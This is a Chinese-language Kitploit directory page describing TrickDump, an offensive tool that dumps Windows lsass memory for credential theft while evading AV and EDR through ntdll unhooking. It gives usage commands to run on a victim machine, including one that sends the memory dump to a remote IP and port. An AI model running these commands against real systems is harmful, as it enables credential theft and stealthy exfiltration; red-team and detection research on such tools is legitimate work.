Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
TrickDump — 仅使用NTAPI函数转储lsass,创建3个JSON文件和1个ZIP文件...稍后生成MiniDump文件! | Kitploit
工具/GitHubGitHub/ricardojoserf/trickdump
内存取证后渗透利用红队
GitHubricardojoserf/trickdump

TrickDump

仅使用NTAPI函数转储lsass,创建3个JSON文件和1个ZIP文件...稍后生成MiniDump文件!

查看仓库网站
566582天前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

TrickDump

TrickDump 转储 lsass 进程时不创建 Minidump 文件,而是生成 3 个 JSON 文件和 1 个包含内存区域转储的 ZIP 文件。分为三个步骤:

  • Lock:使用 RtlGetVersion 获取操作系统信息。
  • Shock:通过 NtOpenProcessToken 和 NtAdjustPrivilegeToken 获取 SeDebugPrivilege 权限,使用 NtGetNextProcess 和 NtQueryInformationProcess 打开句柄,然后通过 NtQueryInformationProcess 和 NtReadVirtualMemory 获取模块信息。
  • Barrel:获取 SeDebugPrivilege 权限,打开句柄,然后通过 NtQueryVirtualMemory 和 NtReadVirtualMemory 获取信息并转储内存区域。

img

在攻击系统中,使用 create_dump.py 脚本生成 Minidump 文件:

root@kitploit:~
python3 create_dump.py [-l LOCK_JSON] [-s SHOCK_JSON] [-b BARREL_JSON] [-z BARREL_ZIP] [-o OUTPUT_FILE] 

该技术的优点包括:

  • 磁盘、内存或网络流量中从未出现过有效的 Minidump 文件。
  • 并非由单个程序或进程执行整个攻击,而是三个独立的程序,可能引发更少的警报。
    • 如果希望只运行一个程序,可以使用 Trick。
    • 如果已掌握目标机器的操作系统信息,可以跳过第一步("Lock")。
  • 这些程序仅使用 NTAPI(本项目是 NativeDump 的变体)。
  • 无需使用 OpenProcess 或 NtOpenProcess 以 PROCESS_VM_OPERATION 和 PROCESS_VM_WRITE 访问权限获取 lsass 进程句柄。
  • 每个程序允许覆盖 ntdll.dll 库的 ".text" 部分以绕过 API 挂钩:
    • "disk":使用磁盘上已有的 DLL。如果未提供第二个参数,路径默认为 "C:\Windows\System32\ntdll.dll"。
    • "knowndlls":使用 KnownDlls 文件夹。
    • "debugproc":使用调试模式下创建的进程。如果未提供第二个参数,进程默认为 "c:\windows\system32\calc.exe"。

提供多种语言版本:

  • .NET:主分支
  • Python:python-flavour 分支
  • Golang:golang-flavour 分支
  • C/C++:c-flavour 分支
  • BOF 文件:bof-flavour 分支
  • Crystal:crystal-flavour 分支
  • Nim:nim-flavour 分支
  • Rust:rust-flavour 分支

如果启用了 PPL、PEB 结构不可读或二进制文件未编译为 64 位,则该技术将无法运行。更新:现在可以在不读取 PEB 的情况下执行程序,请查看 peb-unreadable 分支 :)

该技术可在最新版本的 Windows 上正常运行,并已针对常见 AV 和 EDR 解决方案进行测试,但隐蔽性取决于所选的“风格”:使用不常见的语言并自定义二进制文件可获得最佳效果!


用法

在受害者系统上执行程序,生成三个 JSON 文件(包含内存区域信息)和一个 zip 文件(包含每个内存区域的转储)。

root@kitploit:~
Lock.exe [disk/knowndlls/debugproc]
root@kitploit:~
Shock.exe [disk/knowndlls/debugproc]
root@kitploit:~
Barrel.exe [disk/knowndlls/debugproc]

可以直接执行程序而不覆盖 ntdll.dll 库:

img1

或者使用三种不同的覆盖技术之一:

img2

然后生成 Minidump 文件:

img3


一体化

如果希望只执行一个二进制文件,Trick.exe 会生成一个包含 3 个 JSON 文件和包含内存区域的 ZIP 文件的 ZIP 文件:

root@kitploit:~
Trick.exe [disk/knowndlls/debugproc] [IP_ADDRESS] [PORT]

可以在本地创建 ZIP 文件,并可选择使用 Ntdll 覆盖方法:

img5

或者使用第二个和第三个参数(IP 地址和端口)将其发送到远程端口:

img6

无论哪种情况,都会得到一个如下所示的 ZIP 文件,解压后创建 Minidump 文件:

img7

下载工具